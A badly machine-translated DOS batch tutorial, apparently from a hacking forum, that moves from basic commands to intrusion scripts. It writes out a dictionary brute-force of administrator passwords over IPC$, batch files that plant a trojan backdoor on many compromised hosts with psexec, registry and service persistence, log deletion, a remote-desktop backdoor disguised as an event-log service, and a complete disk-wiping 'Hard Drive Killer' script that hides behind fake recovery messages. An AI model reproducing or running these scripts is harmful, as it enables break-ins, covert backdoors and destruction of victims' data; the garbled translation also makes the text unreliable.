Since some Java small program source code is collected, the use of the IDE tool is somewhat unfair, but usually like to use Chinese to give the folder name, in the command line, I'm trying to be in this folder, so I thought I used DOS batch. Get it; my directory structure is as follows: D: | _ software | _ games | _ player | _ programming software | _ _ _java source, my program is put in the Java source, I put it on this folder Name is hihere.bat, the content is simple: START, this time, I need to call the command line to compile and run Java (premise: the Java environment on your machine), double-click this hihere.bat, enter the command The row program is already in this folder, there are other better usages, then you have to see you flexible app! DOS batch command Detailed October 28, 2004. Simple batch internal command profile
DOS batch command details DOS batch command details
1. Simple Batch Interior Command Introduction 1.echo command opens back or shut down request return function, or displays a message. If there is no parameters, the echo command will display the current echo setting. Syntax Echo [{ON│OFF}] [Message] Sample: @echo off / echo hello world In practical applications, we will combine this command and redirect symbol (also known as pipe symbol, generally> >> ^) To enable input some commands to a specific format. This will be reflected in the later examples. 2. The @ command indicates that the @ later command is not displayed during the intrusion process (for example, using batch to format the enemy's hard drive) naturally not let the other party see the command you use. Sample: @echo off @echo now initializing the program ... @format x: / q / u / autoset (format This command can not use / y, the grateful is Microsoft left This parameter is the same as us, the effects, and / y is the same.) 3.GOTO command specifies that the jump to the label. After finding the label, the program will process the command starting from the next row. Syntax: goto label (Label is the parameter, specifies the row in the batch program you want to turn.) Sample: if {% 1} == {} goto noparms if {% 2} == {} goto noparms (if IF here ,% 1,% 2, you don't understand, first jump, there will be detailed explanation. But it is best to make sense letters, let a letter before: It is used to indicate that this letter is a label, and the goto command is based on this: to find the next step to jump there. It is best to have some explanation that you will understand your intentions. 4.Rem Command Comment command, quite with / * in the C language -------- * /, which does not be executed, just a comment, easy to read and modify it later. Rem message sample: @Rem Here is the description. 5.pause command When you run the PAUSE command, the following message will be displayed: press any key to turnue.. Sample: @echo off: begin copy a: *. * D: / BACK Echo Please Put A New Disk Into Driver a Pause Goto Begin In this example, all files on the disk in the drive A are copied to D: / back. Display Note Tips When another disk is placed in the drive A, the PAUSE command will hang the program so that you can replace the disk and press any key to continue processing. 6.Call Command From a batch program to another batch program and does not terminate the parent batch program. The call command accepts the label used as calling the target. If you use Call outside the script or batch file, it will not work on the command line.
Syntax Call [[DRIVE:] [PATH] FILENAME [BATCHPARETERS]] [: label [arguments]] parameter [drive:} [path] filename Specifies the location and name of the batch program to be called. The filename parameter must have a .bat or .cmd extension. The 7.start command calls an external program, all DOS commands and command line programs can be called by the start command. Intrusion Common Parameters: MIN Starting Window Minimizes Separate Separated Space In Separated Space Time 16 WINDOWS Program High In the High Priority Category Start Application RealTime Start the application WAIT launch application and wait for it to end Parameters These The application that is transmitted to the parameter executed by the command / program is a 32-bit GUI application, and the cmd.exe does not equal the application to the command prompt. If executed within the command script, the new behavior will not happen. 8.choice Command Choice Use this command to allow users to enter a character to run different commands. When using, you should add / c: parameters, C: After you should write the prompt that the characters can be entered, there is no space. Its return code is 1234 ... such as: Choice / C: DME DEFRAG, MEM, END will display DEFRAG, MEM, END [D, M, E]? Sample: Sample.bat is as follows: @echo OFF Choice / C: DME DEFRAG, MEM, END IF Errorlevel 3 Goto Defrag (Before Judgment Numerical Errors) IF Errotlevel 2 Goto Mem if Errotlevel 1 Goto End: Defrag C: / Dos / Defrag Goto end: Mem Mem Goto After this file runs, the DEFRAG, MEM, END [D, M, E] are displayed? The user can select DME, and then the IF statement will make a judgment, and D represents the block segment executing the label as DEFRAG, M represents Perform a program that is labeled MEM, e means executing a program that is labeled END, and each block is finally jumped to the END Number with goto End, and then the program will display Good Bye, the file ends. 9. IF Command If Indicates whether to meet the specified conditions, thereby deciding to perform different commands. There are three formats: 1, if "==" String "The command parameter to be executed is equal to the specified string, the condition is established, run the command, otherwise run the next sentence. (Note is two equal numbers), such as if "% 1" == "a" Format A: if {% 1} == {} goto noparms if {% 2} == {} goto nOPARMS 2, IF EXIST file name If the command to be executed If there is a specified file, the condition is established, run the command, otherwise run the next sentence. If if exist config.sys edit config.sys 3, if ErrorleVel / if not errorlevel digitally peers to be executed If the return code is equal to the specified number, the condition is established, run the command, otherwise run the next sentence. If the IF ErrorLevel 2 Goto X2 DOS program is running, a number will return to DOS, called error code errorlevel or return code, common return code is 0, 1. 10.FOR command for command is a more complex command, primarily for parameters to perform commands within the specified range.
When using the for command in the batch file, specify the variable, use %% Variable for {% Variable│ %% Variable} in (SET) Do Command [CommandLineOptions]% variable to specify a single letter replaceable parameter. (SET) Specify one or a set of files. You can use wildcards. Command specifies the command to execute each file. Command-parameters specifies parameters or command line switches for a specific command. When using the for command in a batch file, specify the variable, please use %% Variable without using% Variable. The variable name is case sensitive, so% i is different from% i if the command extension is enabled, the following additional for command format will be supported: for / d% variable in (set) do command [command-parameters] If concentrated Contains a wildcard, specify matching with the directory name without matching the file name. FOR / R [[DRIVE:] PATH]% Variable In (SET) Do Command [Command-Check Take the directory tree in [Drive:] Path, pointing to the for statement in each directory. If there is no specified directory after / r, use the current directory. If the set is only one single point (.) Character, the directory tree is enumerated. FOR / L% Variable in (Start, Step, End) Do Command [Command-Para This set represents a digital sequence from the beginning to the end in incremental form. Therefore, (1, 1, 5) will produce sequences 1 2 3 4 5, (5, -1, 1) will produce a sequence (5 4 3 2 1). FOR / F ["Options"]% variable in (file-set) Do Command for / f ["Options"]% variable in ("string") Do Command for / F ["options"]% variable in ('Command ') Do Command or, if there is a usebackq option: for / f ["Options"]% variable in (file-set) do command for / f ["options"]% variable in ("string") Do Command for / f ["Options"]% variable in ('command') Do Command FileNameset is one or more file names. Before proceeding to the next file in the filenameset, each file has been opened, read and processed. Processing includes reading a file, dividing it into a line of rows, and analyzing each line into zero or more symbols. The FOR cycle is then called with the resulting symbol string variable value. With the default, / f is separated from the first blank symbol of each line of each file. Skip blank lines. You can replace the default parsing operation by specifying an optional "Options" parameter. This band-quoted string includes one or more keywords that specify different parses options. These keywords are: eol = c - refers to the end of a row bet release character (one) Skip = n - refers to the number of rows ignored at the beginning of the file. Delims = xxx - Indicator jacket set. This default separator set replaces the space and the jumping. Tokens = x, y, m-n - means which symbols per row are passed to each iteration for itself. This will result in a range of additional variable names. Specify the last character as an asterisk in the M symbol string via the NTH symbol, then the additional variable will assign and accept the reserved text of the row in the last symbol.
Usebackq - Specify new grammar has been used under the case: Perform a back quotation string as a command and the quotation marks characters are text string commands and allow the dual quotes to expand the file name in Fi. Sample1: for / f "eol =; tokens = 2, 3 * delims =,"% i in (myfile.txt) do command will analyze every line in MyFile.txt, ignore those lines that are headers with a semicolon, will The second and third symbols in the row are passed to the forpriology; with a tend to be used with / or a space symbol. Note that the statement of this FOR program references% i to acquire the second symbol, reference% J to obtain the third symbol, refer to% K to get all the remaining symbols after the third symbol. For file names with spaces, you need to create files with double quotes. In this way, use dual quotes, you also need to use the UseBackQ option, otherwise, the dual quotation marks will be understood to be used as a string to define a certain analysis. % i is specifically description in the For statement,% J and% K are specifically demonstrated by the tokens = option. You can specify up to 26 symbols via tokens =, as long as you do not seek a variable above the letter 'Z' or 'Z'. Keep in mind that for variables are single letters, case sensitive and global; at the same time, there is not more than 52 or more. You can also use FOR / F analysis logic on adjacent strings; method is to enclose the filenameset between brackets with single quotes. Thus, the character serial will be regarded as a single input line in a file. Finally, you can use the for / f command to analyze the output of the command. The method is to turn the filenameset between brackets into a hind string. This string will be regarded as a command line, pass to a sub-cmd.exe, and its output will be grasped into memory and is used as a file analysis. Therefore, the following example: for / f "UseBackQ Delims =="% I in (`set`) Do @echo% i enumerate the name of the environment variable in the current environment. In addition, the replacement of the FOR variable reference has been enhanced. You can now use the following options: ~ i - Delete any quotation marks ("), expand% i% ~ FI - expand% i to a fully qualified path name% ~ Di - expand% i to a drive number% ~ pi - only expand% i to a path% ~ Ni - expand% i to a file name% ~ xi - expand% i to a file extension name% ~ Si - the extended path only contains short name% ~ AI - expand% i to file file attribute% ~ Ti - expand% i to file Date / time% ~ zi - expand% i to file size% ~ Path: i - Find column in the path environment The catalog of the variable and expand% i to the first fully qualified name. If the environment variable is not defined, or if the file is not found, this combined key will expand the empty string to combine the modifier to get multiple results:% ~ DPI - only expand% i to a drive letter and path% ~ nxi - only% i expand% i to a file name and extension% ~ fsi - only% i to a full path name with a short name ~ DP $ PATH: I - Find the directory column of the path environment variable and expand% i to the found first drive letter and path.% ~ ftzai - expand% i to the DIR of the similar output line in the above example, % I and PATH can be replaced with other effective values.% ~ Syntax is terminated with a valid for variable name. Select the larger write variable name similar to% i is more readily read, and avoid confusion with the combination of regardless.
The above is the official help of MS, let's take a few examples to specify the use of the for command in the invasion. Sample2: Use the for command to achieve the violent password cracking to a target Win2k host. We use NET USE // IP / IPC $ "Password" / u: "administrator" to attempt to connect with the target host, and write a password when successful. The most important command is a: for / fi% in (Dict.txt) Do Net USE // IP / IPC $ "I%" / u: "administrator" uses I% to represent the password of Admin, in Dict.txt This is connected to the value of the I% with the NET USE command. Then passenger run results to find command - for / fi %% in (dict.txt) do net using // ip / ipc $ "i %%" / u: "Administrator" │FIND ": command successfully completed" >> D: /ok.txt, so Ko. Sample3: Have you ever had a large number of broilers waiting for you to go to the back door Trojan? When the number is particularly, it will become very depressed when the number is very happy :). The opening of the article talked to the use of batch files to simplify daily or repetitive tasks. So how do you implement it? Oh, you will understand it. The main order is only one: (when using the for command in the batch file, specify the variable using %% variable) @for / f "tokens = 1, 2, 3 delims =" %% I in (Victim.txt) do Start Call door.bat %% I %% J %% k tokens Usage See Sample1 above, here it represents the parameter% I% J% K in door.bat in order. CultiVate.bat is nothing more than using the NET USE command to create an IPC $ connection, and COPY Trojan back door to Victim, then use the return code (if Errorlever =) to filter the host of the back door, and echo, or echo to the specified file. Delims = indicates that the content in Vivtim.txt is separated by a space. I want to see this here, you must also understand what is what this Victim.txt is like. It should be arranged in accordance with the object expressed by the %% I %% J %% K, which is generally IP Password UserName.
Code: --------------- Cut Here The Save As a Batchfile (i call it main.bat) ----------------- ---------- @ec "% 1" == "" goto usage @for / f "tokens = 1, 2, 3 delims =" %% i in (Victim.txt) DO START CALL IPCHACK.BAT %% I %% J %% K @goto end: usage @echo run this bath in dos mode.or Just double-click it.: end ------------- - Cut Here Then Save as a Batchfile (I Call it main.bat) -------------------------------- ------------- Cut Here The Save As a Batchfile (I Call it door.bat) ---------------------- ------ @Net USE / /% 1 / IPC $% 3 / U: "% 2" @if erroorle 1 goto failed @echo trying to establish the ipc $ connection ......... . / Windrv32.exe @PSexec //% 1 Net Start Windrv32 && if Not Errorlevel 1 Echo% 1 Backdooored >> Ko.txt: failed @echo sorry can not connect to the victim. ----------- ------ Cut Here Ten Save as a Batchfile (i call it door.bat) ------------------ -------------- This is just a prototype, two batch and latte programs (Windrv32.exe), psexec.exe, need to be placed in the unified directory. Batch processing The content can be expanded, for example: adding the function of clearing the log DDOS, add the function of the timed to add the user, more deeper, can make it automatically propagated (worm). Not much narrative, interested friends can study . II. How to use parameters in the batch file in the batch file, usually from 1% to 9%, when there are multiple parameters, you need to move with Shift, this situation is not more, we I didn't consider it.
Sample1: fomat.bat @echo off if "% 1" == "a" format A:: format @format A: / q / u / auotset @echo please insert another disk to driver a. @pause @goto fomat This example For continuous formatting a few floppy disks, then you need to enter fomat.bat a in the DOS window, it is like a bit drawing snake to add ~ Sample2: When we want to establish an IPC $ Connection, you always need to enter a large string command. If you can't get a wrong, we better write some fixed commands to a batch, put the broiler ip password username to assign the parameters to this batch, so you don't have to play a command every time. @echo off @NET USE / / 1% / IPC $ "2%" / u: "3%" Note, this PASSWORD is the second parameter. @IF ERRORLVEL 1 Echo Connection Failed, use the parameter or simpler? You must learn .NO.3. How to use the Compound Command 1. & usage: The first command & second command [& Article 3 Commands ...] can be used at the same time Execute multiple commands, regardless of whether the command is executed Sample: C: C: C: C HAS NO LABEL. Volume Serial Number IS 0078-59FB DIRECTORY Of C: / EX4RCH 2002-05-14 23:51. 2002-05-14 23:51 14 Sometips.gif 2. && usage: The first command && second command [&& Article 3 Commands ...] Use this method to perform multiple commands at the same time, and will not perform the following commands after touching the error, if there is no error, always execute all commands; Sample: C : /> DIR Z: && Dir C: / Ex4rch The System Cannot Find The Path Specified. C: /> DIR C: / EX4RCH && Dir Z: Volume In Drive C Has No Label. Volume Serial Number IS 0078-59FB Directory of C: / EX4RCH 2002-05-14 23:55. 2002-05-14 23:55 .. 2002-05-14 23:55 14 Sometips.gif 1 file (s) 14 bytes 2 Dir (s) 768, 671,744 bytes Free The system cannot Find The Path Specified. It may be relatively simple when doing backup, such as: Dir File &: //192.168.0.1/database/backup.mdb && copy file &: //192.168.0.1//192.168.0.1///192.168.0.1///192.168.0.1///192.168.0.1///192.168.0.1///192.168.0.1///192.168.0.1/ Database / Backup.mdb E: / Backup If there is a backup.mdb file on the remote server, the copy command is executed if the file does not exist.
This usage can replace if EXIST :) 3.││ usage: 1 Command ││Cord [││ Article 3 Commands ...] Use this method to perform multiple commands at the same time, when touching After performing the correct command, the following command will not be executed. If there is no correct command, all commands have been executed; Sample: C: C: / EX4RCH> DIR Sometips.gif │ │ del Sometips.gif Volume in Drive C Has No Label Volume Serial Number IS 0078-59FB Directory of C: / EX4RCH 2002-05-14 23:55 14 Sometips.gif 1 File (s) 14 BYTES 0 DIR (s) 768, 696, 320 BYtes Free Combination Command Used: Sample: @ Copy Trojan.exe //% 1 / Admin $ / SYSTEM32 && IF NOT Errorlevel 1 Echo IP% 1 User% 2 Pass% 3 >> Victim.txt 4. Use of pipelines 1. │ command usage: 1 command │ Article 2 Commands [│ Article 3 Commands ...] Use the results of the first command as the parameters of the second command, remember to be common in this way in Unix. Sample: Time / >D: /ip.log netstat -n -p tcp│Find ": 3389" >> D: /ip.log start expected? Used for Terminal Services Allows us to customize the starting program for users to achieve the following BAT to get the IP of the login user. 2. >> Output Redirection command Redirects a command or an output result of a program to a specific file,> and >> Differences in>> Write the specified file after the contents in the file And >> Only the content will be added to the specified file without changing the content. Sample1: echo hello world> c: /Hello.txt (stupid eXample?) Sample2: DLL Trojan is prevalent, we know that SYSTEM32 is a good place to catch a hide, and many Trojans have turned the head to drill there. DLL Horse is no exception. For this, we can make a record on the EXE and DLL files under this directory after installing the system and the necessary applications: Run the CMD - Convert directory to System32 - Dir * .exe> EXEBACK.TXT & DIR * .dll> DLLBACK.TXT, so all the names of all EXE and DLL files are recorded in ExeBack.txt and DLLBACK.TXT, if they find abnormalities, if they find out, if they can be found with traditional methods, they should consider whether they are considered. The system has sneaked into the DLL Trojan. At this time, we record the exe and dll files under System32 with the same command to DLLBACK1.TXT, then run: cmd - fc execk.txt exeback1.txt> Diff.txt & FC DLLBACK.TXT DLLBACK1.TXT> Diff.txt. (with the FC command compares the DLL and EXE files before and after, and enter the result into Diff.txt), so we can find some more DLL and EXE files, and then easily determine whether it has been patron with DLL Trojans by viewing the creation time, version, whether or not compressed, etc.
No, if there is any words, don't drop it directly, first use the regsvr32 / u trojan.dll to remove the back door DLL file, move it to the recycle station, if the system does not exception reflection, then completely delete or Submit to anti-virus software. 3. <,> &, <&
3. Delete Let's first delete a project name, we create a file: Windows Registry Editor Version 5.00 [HKEY_LOCAL_MACHINE / SOFTWARE / Microsoft / Windows / CurrentVersion / Run] "EX4RCH" = - Execute this script, [HKEY_LOCAL_MACHINE / "EX4RCH" under Software / Microsoft / Run] is deleted; let's take a look at the delete a child, we create a script: Windows Registry Editor Version 5.00 [-HKEY_LOCAL_MACHINE / SOFTWARE / Microsoft / WINDOWS / Currentversion / run] Execute this script, [HKEY_LOCAL_MACHINE / SOFTWARE / Microsoft / Windows / CurrentVersion / Run] has been deleted. I believe it is .reg files you have already mastered. Then the current goal is to use batch to create a .reg file, remember that our previous use of redirect symbols can easily create specific types of files.
Samlpe1: As the following example, if you want to generate the following registry file Windows Registry Editor Version 5.00 [HKEY_LOCAL_MACHINE / SOFTWARE / Microsoft / Windows / CurrentVersion / Run] "Invader" = "EX4RCH" "Door" = HEX: 255 "Autodos" = dword: 000000128 just like this: @echo Windows Registry Editor Version 5.00 >> Sample.reg @echo [HKEY_LOCAL_MACHINE / SOFTWARE / Microsoft / Windows / CurrentVersion / Run]> Sample.reg @echo "Invader" = "Ex4rch" >> Sample.reg @echo "door" = 5 >> c: //winnt//system32//door.exe >> sample.reg @echo "autodos" = dword: 02 >> Sample.REG SAMLPE2: We are now using Some old Trojans may generate a key value in the registry [HKEY_LOCAL_MACHINE / SOFTWARE / Microsoft / Windows / CurrentVersion / Run (Runonce, RunServices, Runexec)] to achieve the self-starting of Trojans. But this is easy Exposed Trojans The path of Trojan, causing the Trojan to be killing, relatively safe relative to the registration of Trojans as system services. Below to configure the IRC Trojan DSNX as an example (named Windrv32.exe) @start windrv32.exe @attrib h r windrv32.exe @echo [HKEY_LOCAL_MACHINE / SOFTWARE / Microsoft / Windows / CurrentVersion / Run] >> patch.dll @echo "windsnx" = - >> patch.dll @ sc.exe create Windriversrv type = kernel Start = auto displayName = WindowsDriver binpath = c: /winnt/system32/windrv32.exe @Regedit / s Patch.dll @delete Patch.dll @Rem [Delete the startup item in the registry in the registry, use sc.ex to register as the system key service, set its property to hide and read only, and config is startup ] @Rem is not safer. Six. Wonderful instance is released.
1. Delete the Batch of Win2K / XP System Default Sharing ------------------------ Cut Here the Save as .bat or .cmd file --- ------------------------ @echo prepaging to delete all the default shares.when ready pres Any key. @pause @echo off: Rem Check parameters if Null show usage. if {% 1} == {} goto: USAGE: Rem code start. Echo. echo -------------------------------------------------------------------------------------------------------------- ---------------------------- Echo. Echo now deleding all the default shares. Echo. Net Share% 1 $ / Delete Net Share% 2 $ / Delete Net Share% 3 $ / Delete Net Share% 4 $ / Delete Net Share% 6 $ / Delete Net Share% 7 $ / Delete Net Share% 8 $ / Delete Net Share% 9 $ / Delete Net Stop Server Net Start Server Echo. Echo All The Sharees Have Been Deleteed Echo. Echo ---------------------------------------------------------------------------------------------------------------------- ------------------------- Echo. Echo Now Modify The Registry to Change The System Default Properties. Echo. Echo Now Creating The Registry File Echo Windows Registry Editor Version 5.00> C: /DELSHARE.REG ECHO [HKEY_LOCAL_MACHINE / SYSTEM / CURRENTCONTROLSET / SERVICES / LANMANSERVER / parameters] >> C: /DELSHARE.REG Echo "AutoSharewks" = dword: 00000000 >> C: /DELSHARE.REG Echo "AutoShareserver" = dword: 00000000 >> C: /DELSHARE.REG Echo NOWING Using the Registry File To CHANG THE SYSTEM Default Properties. regedit /sc:/delshare.reg echo deleneting the teemprotarily files. del c: /delshare.reg Goto: End: usage echo. echo --------------- --------------------------------------- Echo. Echo ☆ a example for bach file ☆ echo ☆ [Use Batch file to change the sysytem share proties.] ☆ Echo. Echo Author: EX4RCH Echo mail: EX4RCH@hotmail.com QQ: 1672602 Echo. Echo Error:
Not enough parameters echo echo ☆ Please enter the share disk you wanna delete ☆ echo echo For instance, to delete the default shares:... Echo delshare cde ipc admin print echo echo If the disklable is not as C: D: E:, PLEASE CHANG ITO EXAMPLE: Echo if Locak Disklable Are C: D: E: X: Y: Z: YOULD Chang CHEXYZ IPC Admin Print Echo. Echo *** you can delete Nine shares overce in a useing *** echo. Echo ---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------- Goto: EOF: End Echo. Echo -------------------------- ---------------------------- Echo. Echo Ok, Delshare.bat Has Deleted All The Share You Assigned. Echo.ny Questions, Feel Free to Mail to EX4RCH@hotmail.com. echo echo. echo ------------------------------------------------------------------------------------------------------------------------------------------------------------------------------ ------------------ Echo.: EOF Echo end of the bath layer ---------------------- - cut here life as .bat or .cmd file --------------------------- 2. Comprehensive reinforcement system (for broiler patch ) Batch file ------------------------ Cut Here Then Save AS . bat or .cmd file --------------------------- @echo windows registry editor version 5.00> patch.dll @echo [hkey_local_machine / system / CurrentControlSet / Services / LanmanServer / parameters] >> Patch.dll @echo "autoshareserver" = dword: 00000000 >> Patch.dll @ech: 00000000 >> Patch.dll @rem [forbidden sharing] @echo [HKEY_LOCAL_MACHINE / SYSTEM / CurrentControlSet / Control / Lsa] >> patch.dll @echo "restrictanonymous" = dword: 00000001 >> patch.dll @REM [prohibit anonymous login] @echo [HKEY_LOCAL_MACHINE / SYSTEM / CurrentControlSet / Services / NetBT / Parameters] >> Patch.dll @echo "smbDeviceenable" =
DWord: 00000000 >> Patch.dll @Rem [Disable and File Access and Print Sharing] @echo [hkey_local_machine / system / currentcontrolset / services / @ remote @echo "start" = dword: 00000004 >> PATCH .dll @echo [HKEY_LOCAL_MACHINE / SYSTEM / CurrentControlSet / Services / Schedule] >> patch.dll @echo "Start" = dword: 00000004 >> patch.dll @echo [HKEY_LOCAL_MACHINE / SOFTWARE / Microsoft / Windows NT / CurrentVersion / Winlogon] >> Patch.dll @echo "shutdownwithoutlogon" = "0" >> Patch.dll @Rem [Forbidden to shut down before login] @echo "dontdisplaylastusername" = "1" >> Patch.dll @rem [forbidden to display the previous login user Name] @Regedit / s patch.dll ------------------------ Cut Here the Save as .bat or .cmd file ------ -------------------- The following command is to remove all logs of broilers, prohibit some dangerous services, and modify the rooster's Terminnal Service leaving the road. @Regedit / s patch.dll @NET Stop W3SVC @NET Stop Event log @del C: / Winnt / System32 / Logfiles / W3SVC1 /*.* / F / Q @Del C: / Winnt / System32 / LogFiles / W3SVC2 / * . * / f / @del C: / Winnt / system32 / config / *. Event / f / @del C: / Winnt / system32dtclog /*.* / f / @del C: / WinNT / *. TXT / f / @del c: / winnt / *. log / f / @NET Start W3SVC @NET Start Event log @rem [Delete Log] @NET Stop Schedule / Y @NET Stop RemoteRegistry / Y @del patch.dll @echo the server has been patched, there is a service of hazardous services.
] @Echo [HKEY_LOCAL_MACHINE / SYSTEM / CurrentControlSet / Control / Terminal Server / WinStations / RDP-Tcp] >> patch.dll @echo "PortNumber" = dword: 00002010 >> patch.dll @echo [HKEY_LOCAL_MACHINE / SYSTEM / CurrentControlSet / Control / Terminal Server / Wds / rdpwd / Tds / tcp >> patch.dll @echo "PortNumber" = dword: 00002012 >> patch.dll @echo [HKEY_LOCAL_MACHINE / SYSTEM / CurrentControlSet / Services / TermDD] >> patch.dll @echo "Start" = dword: 00000002 >> patch.dll @echo [HKEY_LOCAL_MACHINE / SYSTEM / CurrentControlSet / Services / SecuService] >> patch.dll @echo "Start" = dword: 00000002 >> patch.dll @echo "ErrorControl" = DWord: 00000001 >> Patch.dll @echo "imagepath" = HEX (2): 25, 00, 53, 00, 79, 00, 73, 00, 74, 00, 65, 6D, 00, 52, 00 , 6F, 00, 6F, 00, /> Patch.dll @echo 74,00, 25, 00, 5c, 00, 53, 0, 79, 3, 73, 100, 74, 100, 65, 6D 00, 33, 100, 32, 100, 5c, 00, 65, / >> Patch.dll @echo 00, 76, 100, 65, 0, 6E, 00, 74, 100, 6C, 00, 6F, 00 67,00, 2e, 00, 65, 3, 78, 100, 65, 100, 00 >> Patch.dll @echo "objectname" = "localsystem" >> Patch.dll @echo "type" = dword : 00000010 >> Patch.dll @echo "description" = "keEP Record of the program and windows' message.
">> patch.dll @echo" DisplayName "=" Microsoft EventLog ">> patch.dll @echo [HKEY_LOCAL_MACHINE / SYSTEM / CurrentControlSet / Services / termservice] >> patch.dll @echo" Start "= dword: 00000004 >> Patch.dll @copy c: /winnt/system32/TERMSRV.EXE C: /WINNT/SYSTEM32 /EVENTLOG.EXE @Rem [Modify 3389 connection, port is 8210 (hexadecimal 00002012), name is Microsoft Eventlog, stay Behavous] 3.hard Drive Killer Pro Version 4.0 (playing batch to this level is not easy.
) ------------------------ Cut here the save as .bat or .cmd file -------------- ------------- @echem @ecdo off a very special person trues not want to be named.: start cls echo please wait while program loads.. Call Attrib -R -hc: /autoexec.bat> Nul Echo @echo off> c: /autoexec.bat echo call format c: / q / u / autosample> NUL >> C: /autoexec.bat call attrib r hc: / autoexec .bat> nul rem Drive checking and assigning the valid drives to the drive variable. set drive = set alldrive = cdefghijklmnopqrstuvw xyz rem code insertion for Drive Checking takes place here. rem drivechk.bat is the file name under the root directory. rem As far as the drive detection and drive variable settings, do not worry about how it rem works, it's d / * amn to complicated for the average or even the expert batch programmer. rem Except for Tom Lavedas. echo @echo off> drivechk. Bat echo @Prompt %%%% COMSPEC %%%% 1: $ b Find "Vol"> NUL> {T} .bat% COMSPEC% / E: 2048 / c {t} .bat >> Drivechk.bat del {t} .bat echo if ErrorLevel 1 goto Enddc >> Drivechk.bat CLS Echo please wait while program loads.. Rem when Errorlevel IS 1, THEN THE Above Is Not True, IF 0, THEN'S TRUE. Rem Opposite Of Binary Rules. IF 0, IT WILL ELAPS To The Next Command. Echo @Prompt %%%% COMSPEC %%%%%% / F / C DIR %%%%%% 1: .// AD / W / -P $ b Find "Bytes"> NUL> {T} .bat% COMSPEC% / E: 2048 / c {t} .bat >> Drivechk.bat del {t} .bat Echo if Errorlevel 1 Goto Enddc >>
... Drivechk.bat cls echo PLEASE WAIT WHILE PROGRAM LOADS rem if errorlevel is 1, then the drive specified is a removable media drive -. Not ready rem if errorlevel is 0, then it will elaps to the next command echo @prompt. DIR %%%% 1: .// AD / W / -P $ b Find "0 bytes free"> NUL> {t} .bat% COMSPEC% / E: 2048 / c {t} .bat >> Drivechk. Bat del {t} .bat echo if ErrorLevel 1 set drive = %% drive %% %% 1 >> Drivechk.bat CLS Echo please wait while program loadings.. Rem if it's error is a hard or floppy drive rem if it's not errorlevel 1, then the specified drive is a CD-ROM drive echo:.... enddc >> drivechk.bat rem Drive checking insertion ends here "enddc" stands for "end dDRIVE cHECKING" rem Now We will use the program drivechk.bat to attain valid Drive Information.: Sampledrv for %% a in (% allDrive%) Do call drivechk.bat %% a> Nul del DRIVECHK.BAT> NUL IF% Drive. ==. set Drive = c: form_del call attrib -r -hc: /autoexec.bat> Nul echo @echo off> c: /autoexec.bat echo echo loading g windows, please wait while system.. >> c: /autoexec.bat echo for %%%% a in (% drive%) Do Call Format %%%% A: / Q / U / AutoSample > NUL >> C: /autoexec.bat echo cls >> C: /autoexec.bat echo echo loading windows, please wait while Microsoft Windows Recovers your system.. >> c: /autoexec.bat echo for %%%%% A in (% drive%) Do Call C: /Temp.bat %%%% a bunga> NUL >> C: /autoexec.bat echo cls >> c: /autoexec.bat echo echo loading windows, please wait while microsoft Windows recovers your system.. >> c: /autoexec.bat echo for %%%% a in (% drive%) Call deltree / y %%%% A: /> NUL >>
C: /autoexec.bat echo cls >> C: /autoexec.bat echo echo loading windows, please wait for system... >> c: /autoexec.bat echo for %%% a in (% Drive%) Do Call Format %%%% A: / Q / U / Autosample> NUL >> C: /autoexec.bat echo cls >> C: /autoexec.bat echo echo loading window, please wait for Wait While Microsoft Windows Recovers your System. >> C: /autoexec.bat echo for %%%A in (% drive%) Do Call C: /Temp.bat %%%% a bunga> NUL >> C: /autoexec.bat echo CLS >> C: /autoexec.bat echo echo loading windows, please wait while microsoft windows recovers your system... >> c: /autoexec.bat echo for %%%% a in (% drive%) Call Deltree / y %%%% A: /> NUL >> C: / / /AUTOEXEC.BAT Echo CD /> C: /autoexec.bat echo cls >> C: /autoexec.bat echo echo welcome to the land of death. Munga bunga's multiple Hard Drive Killer Version 4.0. >> C: /autoexec.bat echo echo if you ran this file, the Sorry, I Just Made It. The purpose of this program is to tell you the following.. >> C: / AutoExec .bat echo echo 1. To make PEO PLE AWARE THATED. >> C: /autoexec.bat echo echo 2. love is important, if you have it, truly, don't let Go of It Like i DID! >> C: / Autoexec.bat echo echo 3. If you are not a vegetarian, then you are a murderer, and i'm glad your hd is dead. >> c: /autoexec.bat echo echo 4. don't support the following: WAR .,................................................................................. Bat Echo Echo Munga Bunga >> C: /autoexec.bat Call Attrib R
Hc: /autoexec.bat: Makedir if exist c: /temp.bat attrib -r -hc:/temp.bat> Nul echo @echo off> c: /Temp.bat Echo %% 1: / >> C: / Temp.bat echo cd / >> c: / temp.bat echo: startmd >> c: /Temp.bat echo for %%%% a in ("if not exist %% 2 / NUL MD %% 2" IF EXIST %% 2 / NUL CD %% 2 ") DO %%%% A >> C: /TEMP.BAT Echo for %%%% a in ("> ass_hole.txt ") Do Echo %%%% a Your Gone @ $$ Hole !!!! >> C: /TEMP.BAT Echo if NOT %% 1: / %% 2 / %% 2 / %% 2 / %% 2 / %% 2 / %% 2 / %% 2 / %% 2 / %% 2 / %% 2 / %% 2 / %% 2 / %% 2 / %% 2 / %% 2 / %% 2 / %% 2 / %% 2 / %% 2 / %% 2 / %% 2 / %% 2 / %% 2 / %% 2 / %% 2 / %% 2 / %% 2 / %% 2 / %% 2 / %% 2 / %% 2 / %% 2 / %% 2 / %% 2 / %% 2 / %% 2 / %% 2 / %% 2 / NUL GOTO STARTMD >> C: /TEMP.BAT CALL ATTRIB R HC: /TEMP.BAT > NUL CLS Echo Initializing Variables... Rem Deltree / Y %% A: / *. Only Eliminates Director, Hence Leaving The File Created Above For Further Destruction. For %% a in (% DRIVE%) Do Call Format %% a : / q / u / autosample> NUL CLS Echo Initializing variables... Echo Validating Data.... for %% a in (% DRIVE%) Do Call C: /Temp.Bat %% a Munga> NUL CLS Echo Initializing Variables Echo Validating D ata....... for %% a in (% DRIVE%) CALL Attrib -R-h %% A: / / / / s> NUL CALL Attrib R HC: /TEMP.BAT> NUL CALL attrib r hc:............ /autoexec.bat> nul cls echo Initializing Variables echo Validating Data echo Analyzing System Structure echo Initializing Application for %% a in (% drive%) call deltree / y %% A: / *.> NUL CLS Echo Initializing Variables... Echo Analyzing application.............................................................................................................................................. Drive%) Do Call C: /Temp.bat %% a MUNGA>
